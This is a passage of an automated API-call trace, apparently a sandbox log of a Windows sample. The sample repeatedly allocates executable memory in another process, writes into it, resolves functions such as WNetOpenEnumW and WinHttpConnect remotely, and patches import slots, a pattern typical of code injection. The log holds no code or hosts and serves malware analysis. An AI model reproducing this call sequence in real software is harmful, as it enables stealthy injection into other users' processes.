	[0230.206] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.206] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27506b4*, nSize=0xe, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27506b4*, lpNumberOfBytesWritten=0x12858c*=0xe) returned 1
	[0230.206] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.206] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.206] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.206] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.206] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.207] ResetEvent (hEvent=0x60c) returned 1
	[0230.207] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.207] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.207] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.207] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.207] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.207] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd4719c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.208] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.208] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.208] lstrlenA (lpString="WNetEnumResourceW") returned 17
	[0230.208] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.208] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27506c4*, nSize=0x12, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27506c4*, lpNumberOfBytesWritten=0x12858c*=0x12) returned 1
	[0230.208] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.208] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.208] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.208] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.209] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.209] ResetEvent (hEvent=0x60c) returned 1
	[0230.209] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.209] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.209] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.209] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.209] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.210] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471a0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.210] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.210] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.210] lstrlenA (lpString="WNetOpenEnumW") returned 13
	[0230.210] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.210] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27506d8*, nSize=0xe, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27506d8*, lpNumberOfBytesWritten=0x12858c*=0xe) returned 1
	[0230.211] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.211] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.211] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.211] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.211] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.212] ResetEvent (hEvent=0x60c) returned 1
	[0230.212] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.212] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.212] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.212] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.212] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.212] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471a4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.213] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.213] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0230.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275084c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0230.213] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0230.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275084c, cbMultiByte=-1, lpWideCharStr=0x2778460, cchWideChar=10 | out: lpWideCharStr="ntdll.dll") returned 10
	[0230.213] lstrlenW (lpString="ntdll.dll") returned 9
	[0230.213] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.213] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2778460*, nSize=0x14, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2778460*, lpNumberOfBytesWritten=0x12858c*=0x14) returned 1
	[0230.213] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0230.213] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.213] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.214] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0230.214] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0230.214] ResetEvent (hEvent=0x60c) returned 1
	[0230.214] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.214] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0230.214] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.215] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.215] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.215] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778460) returned 1
	[0230.215] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.215] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.215] lstrlenA (lpString="_vsnwprintf") returned 11
	[0230.215] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.215] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27506e8*, nSize=0xc, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27506e8*, lpNumberOfBytesWritten=0x12858c*=0xc) returned 1
	[0230.215] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.216] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.216] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.216] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.216] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.216] ResetEvent (hEvent=0x60c) returned 1
	[0230.216] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.216] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.217] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.217] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.217] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.217] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471ac, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.217] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.217] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0230.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2750860, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11
	[0230.217] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0230.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2750860, cbMultiByte=-1, lpWideCharStr=0x2778460, cchWideChar=11 | out: lpWideCharStr="USER32.dll") returned 11
	[0230.217] lstrlenW (lpString="USER32.dll") returned 10
	[0230.218] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.218] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2778460*, nSize=0x16, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2778460*, lpNumberOfBytesWritten=0x12858c*=0x16) returned 1
	[0230.218] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0230.218] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.218] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.218] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0230.218] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0230.219] ResetEvent (hEvent=0x60c) returned 1
	[0230.219] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.234] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0230.234] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.234] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.234] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.234] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778460) returned 1
	[0230.234] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.234] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.234] lstrlenA (lpString="wsprintfA") returned 9
	[0230.234] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.234] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x27506f6*, nSize=0xa, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x27506f6*, lpNumberOfBytesWritten=0x12858c*=0xa) returned 1
	[0230.235] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.235] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.235] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.235] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.235] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.236] ResetEvent (hEvent=0x60c) returned 1
	[0230.236] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.236] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.236] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.236] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.236] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.236] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471b4, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.237] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.237] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.237] lstrlenA (lpString="wsprintfW") returned 9
	[0230.237] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.237] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750702*, nSize=0xa, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750702*, lpNumberOfBytesWritten=0x12858c*=0xa) returned 1
	[0230.237] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.237] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.237] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.238] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.238] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.238] ResetEvent (hEvent=0x60c) returned 1
	[0230.238] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.238] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.238] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.239] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.239] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.239] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471b8, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.239] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.239] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0230.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275088c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12
	[0230.239] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0230.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275088c, cbMultiByte=-1, lpWideCharStr=0x2778460, cchWideChar=12 | out: lpWideCharStr="WINHTTP.dll") returned 12
	[0230.239] lstrlenW (lpString="WINHTTP.dll") returned 11
	[0230.239] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.240] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2778460*, nSize=0x18, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2778460*, lpNumberOfBytesWritten=0x12858c*=0x18) returned 1
	[0230.240] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0230.240] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.240] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.240] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0230.240] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0230.241] ResetEvent (hEvent=0x60c) returned 1
	[0230.241] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.244] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0230.244] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.244] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.244] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.244] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778460) returned 1
	[0230.244] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.245] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.245] lstrlenA (lpString="WinHttpCloseHandle") returned 18
	[0230.245] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.245] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275070e*, nSize=0x13, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275070e*, lpNumberOfBytesWritten=0x12858c*=0x13) returned 1
	[0230.245] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.245] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.245] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.245] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.246] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.246] ResetEvent (hEvent=0x60c) returned 1
	[0230.246] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.246] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.246] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.246] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.246] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.246] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd471c0, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.247] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.247] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.247] lstrlenA (lpString="WinHttpConnect") returned 14
	[0230.247] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
